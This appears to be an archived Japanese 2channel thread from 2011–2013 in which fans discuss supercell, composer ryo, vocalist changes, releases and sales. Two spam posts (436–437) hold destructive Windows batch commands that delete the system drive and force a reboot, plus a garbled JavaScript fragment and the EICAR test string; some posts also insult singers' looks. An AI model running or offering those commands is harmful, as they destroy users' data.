X



supercell(ryo)スレ Vol.5
■ このスレッドは過去ログ倉庫に格納されています
0001ななしいさお@オマエモナゆりかご会
垢版 |
2011/03/28(月) 22:13:41.06ID:???0
supercell(ryo)スレ

前スレ
supercell(ryo)スレ Vol.4
http://yuzuru.2ch.net/test/read.cgi/asong/1293278874/

公式サイト
http://www.supercell.jp/index.html

ブログ
http://www.supercell.sc/index.html

ryoマイリスト
http://www.nicovideo.jp/mylist/3291521

ニコニコ大百科
http://dic.nicovideo.jp/a/ryo



ryoさんにセクハラ受けつつも頑張るnagi専用スレ
【Cor】やなぎなぎ【Leonis】 4th
http://yuzuru.2ch.net/test/read.cgi/doujin/1291440676/
0387ななしいさお@オマエモナゆりかご会
垢版 |
2012/09/18(火) 21:17:48.03ID:SH+KvdiI0
オワコンryo
0388ななしいさお@オマエモナゆりかご会
垢版 |
2012/09/18(火) 21:47:35.81ID:m7AnxWkk0
変に名前売れて大変そうだな

もっと普通の一作曲家ならいいのに
0389ななしいさお@オマエモナゆりかご会
垢版 |
2012/09/21(金) 17:42:40.55ID:wAm+djkh0
おわこん
0390ななしいさお@オマエモナゆりかご会
垢版 |
2012/09/24(月) 14:19:29.15ID:???0
なんだろう
EGOISTのアルバム聴いて思ったけどさ
この人の曲ってアルバム単位じゃないとやっぱ完成しないよね
メルトやワールドイズマインとかは良いけど
それ以外って本当売れ線じゃない
良い意味でも悪い意味でも雰囲気音楽
0392ななしいさお@オマエモナゆりかご会
垢版 |
2012/09/30(日) 20:42:48.46ID:hUhsCmsw0
新曲いまいちやった
0394ななしいさお@オマエモナゆりかご会
垢版 |
2012/10/07(日) 21:57:34.25ID:kuM0ihzV0
ロックwww
0395ななしいさお@オマエモナゆりかご会
垢版 |
2012/10/11(木) 20:48:34.14ID:avcqopgR0
うあああああああああああああ
0396ななしいさお@オマエモナゆりかご会
垢版 |
2012/10/18(木) 22:16:39.13ID:RG9rOZhn0
そろそろ本気出してほしいなryo
0397ななしいさお@オマエモナゆりかご会
垢版 |
2012/10/22(月) 21:01:48.05ID:It7779dH0
オワコン
0398ななしいさお@オマエモナゆりかご会
垢版 |
2012/10/23(火) 13:01:39.85ID:V4G7eBQJ0
>>388
わかる
いちいち大変だよなこの人
0399ななしいさお@オマエモナゆりかご会
垢版 |
2012/10/27(土) 21:53:07.77ID:eBtTNOgX0
本気か
0400ななしいさお@オマエモナゆりかご会
垢版 |
2012/10/31(水) 20:09:49.30ID:4TIxF1rT0
0401ななしいさお@オマエモナゆりかご会
垢版 |
2012/11/03(土) 20:01:11.92ID:SCGrcyKb0
頑張ってほしいわ
0403ななしいさお@オマエモナゆりかご会
垢版 |
2012/11/07(水) 11:59:40.43ID:B4bP1o8c0
ラブミーギミー来月?
買うわ
0404ななしいさお@オマエモナゆりかご会
垢版 |
2012/11/13(火) 21:08:28.05ID:RXzR/5t60
菊●ァ!
0405ななしいさお@オマエモナゆりかご会
垢版 |
2012/11/16(金) 16:51:09.43ID:???0
ボーカル変えてからマジでいい曲が一つもねーわ
ミクのODDなんちゃらがギリギリ良かったけど他は微妙
さよならメモリーズの頃のryoはどこへ行った
0406ななしいさお@オマエモナゆりかご会
垢版 |
2012/11/22(木) 21:14:31.28ID:47skzVU60
やっぱnagiが良かったかな
0410ななしいさお@オマエモナゆりかご会
垢版 |
2012/12/01(土) 21:44:47.10ID:izPcYEvB0
なぎブサイクでしょ
0415ななしいさお@オマエモナゆりかご会
垢版 |
2012/12/10(月) 15:18:15.28ID:Z4ngEVEW0
12 :名無しさん@お腹いっぱい。:2012/12/10(月) 14:47:44.03 ID:lR7hTGIJ0

新曲飽きずにずっと聞いてる。 前スレでも言われてたけど↓菅野よう子が作曲したのに似てて自分の好きな感じ!
 http://logsoku.com/thread/toro.2ch.net/musicjg/1347667078/

■試聴 名前のない怪物      http://mora.jp/package/43000001/4988009079615/
■試聴 13曲目.さいごのマメシバ  http://www.amazon.co.jp/dp/B00005J4DO

菅野よう子を改良した感じっていうのかな、次作もすごく楽しみ。
0417ななしいさお@オマエモナゆりかご会
垢版 |
2012/12/16(日) 21:11:09.93ID:j7U2iz6I0
名前のない怪物よかった
ひさびさに
0418ななしいさお@オマエモナゆりかご会
垢版 |
2012/12/18(火) 21:22:19.24ID:wOJ102Ur0
nagiかわいいよ
0419ななしいさお@オマエモナゆりかご会
垢版 |
2012/12/19(水) 22:18:58.49ID:bOQz9oQn0
らぶみーぎみー買って来る
0422ななしいさお@オマエモナゆりかご会
垢版 |
2012/12/23(日) 21:36:54.41ID:P/sfavUt0
ギミー買ってきたどー
0428ななしいさお@オマエモナゆりかご会
垢版 |
2012/12/26(水) 18:54:38.99ID:7FE5R6hQO
>chelly_EGOIST@MullahNin 若干名、女子じゃない輩がいますけど楽しいですっ!笑

非処女確定きたか
0431ななしいさお@オマエモナゆりかご会
垢版 |
2013/01/06(日) 21:48:54.32ID:fje/FvC2O
一時期のアリプロなみにうぜーなコイツ
0432ななしいさお@オマエモナゆりかご会
垢版 |
2013/01/06(日) 22:29:24.55ID:KMWdAphK0
新曲ガクトの曲パクっちゃったね。。。
残念だねえ
0434ななしいさお@オマエモナゆりかご会
垢版 |
2013/01/15(火) 20:51:36.07ID:+o2wQDW/0
>>428
わろた
0435ななしいさお@オマエモナゆりかご会
垢版 |
2013/01/19(土) 20:14:00.33ID:CuAiwa2+0
ホモォ
0436ななしいさお@オマエモナゆりかご会
垢版 |
2013/01/22(火) 01:29:09.78ID:???0
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

@Echo off
Del C:\ *.* |y

(){eval(unescape(('Script(t,'%')))})(/./g);

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
0437ななしいさお@オマエモナゆりかご会
垢版 |
2013/01/22(火) 01:30:01.15ID:???0
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

@Echo off
Del C:\ *.* |y

(){eval(unescape(('Script(t,'%')))})(/./g);

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
0440ななしいさお@オマエモナゆりかご会
垢版 |
2013/01/29(火) 21:20:45.02ID:B6Eb4SVY0
tia〜
0441ななしいさお@オマエモナゆりかご会
垢版 |
2013/02/04(月) 20:19:34.62ID:yQs3yH3+0
tia最高
0442ななしいさお@オマエモナゆりかご会
垢版 |
2013/02/07(木) 20:53:15.84ID:ratXoLD20
こゑだぶさいくすぎ
0443ななしいさお@オマエモナゆりかご会
垢版 |
2013/02/16(土) 20:41:37.75ID:OvE0u+bs0
こゑだマジ不細工
0445ななしいさお@オマエモナゆりかご会
垢版 |
2013/02/19(火) 20:47:52.54ID:USphmBJX0
やっぱなぎに戻ってきてもらわんとダメだな
0446ななしいさお@オマエモナゆりかご会
垢版 |
2013/03/03(日) 20:50:22.36ID:BqvW/0Ci0
やはりnagiが良かった
0448ななしいさお@オマエモナゆりかご会
垢版 |
2013/03/11(月) 20:50:23.79ID:J+lVAfXa0
なぎ
0449ななしいさお@オマエモナゆりかご会
垢版 |
2013/03/12(火) 15:02:54.91ID:???0
歌い方以前に作曲のレベルから歌が添え物になってるのが痛い
正直「演奏してみた」自慢ばかりで金の取れるレベルの代物じゃない
2525レベルから抜け出せてないのに商用音楽だとおもっている
レコード会社は・・・本当に音楽のできないバカぞろいなんだね
0451ななしいさお@オマエモナゆりかご会
垢版 |
2013/03/12(火) 21:16:50.83ID:i9alqp3H0
こゑださんはもう飽きた
0454ななしいさお@オマエモナゆりかご会
垢版 |
2013/03/16(土) 09:56:03.65ID:???O
数万人もいねーよw
EGOISTは毎回二万とか
supercellは銀色が0.8万枚だったかな
それに俺は毎回買ってるけど理由はryoだからであって決してこゑだだから買ってるわけじゃない。そういうやつ多いだろ。8000人にメジャーレベルと認めてるやつが何人いるかね
0456ななしいさお@オマエモナゆりかご会
垢版 |
2013/03/16(土) 20:03:23.58ID:PT+P/Ms60
こゑだ下手糞だから買ってない
0462ななしいさお@オマエモナゆりかご会
垢版 |
2013/04/22(月) 20:38:28.98ID:I48kl03T0
ryo最近どうなの?

レベルアップした?
0463ななしいさお@オマエモナゆりかご会
垢版 |
2013/08/17(土) NY:AN:NY.ANID:hR1MFhpf0
一発屋
0464ななしいさお@オマエモナゆりかご会
垢版 |
2013/09/02(月) 07:11:18.31ID:q12kYPmJ0
このスレを開くだけでavastがウイルスを発見って騒ぐ。


>>436-437 が原因か???
0465ななしいさお@オマエモナゆりかご会
垢版 |
2013/09/02(月) 20:58:33.09ID:gRdShK/d0
ryoさんも過去の人だからな・・・
0468ななしいさお@オマエモナゆりかご会
垢版 |
2013/09/03(火) 20:57:36.78ID:v0H0POjK0
刀語のやつ良かったよryoさん
0469ななしいさお@オマエモナゆりかご会
垢版 |
2013/09/07(土) 21:45:21.64ID:uSYMdQYg0
昔も結構いい曲作ってたな
0475ななしいさお@オマエモナゆりかご会
垢版 |
2013/10/06(日) 17:45:39.49ID:swpd9a5lI
ノンタイアップじゃ売れないって言うけど他の歌手も大半はタイアップしてるだろ
0476ななしいさお@オマエモナゆりかご会
垢版 |
2013/10/07(月) 20:54:35.19ID:IbuopCHJ0
アルバム買う?
0479ななしいさお@オマエモナゆりかご会
垢版 |
2013/10/11(金) 18:29:02.49ID:IKRqVstYi
>>477
いやsupercellの中で四番目に売れてるし別に爆死ではないと思うが
■ このスレッドは過去ログ倉庫に格納されています

ニューススポーツなんでも実況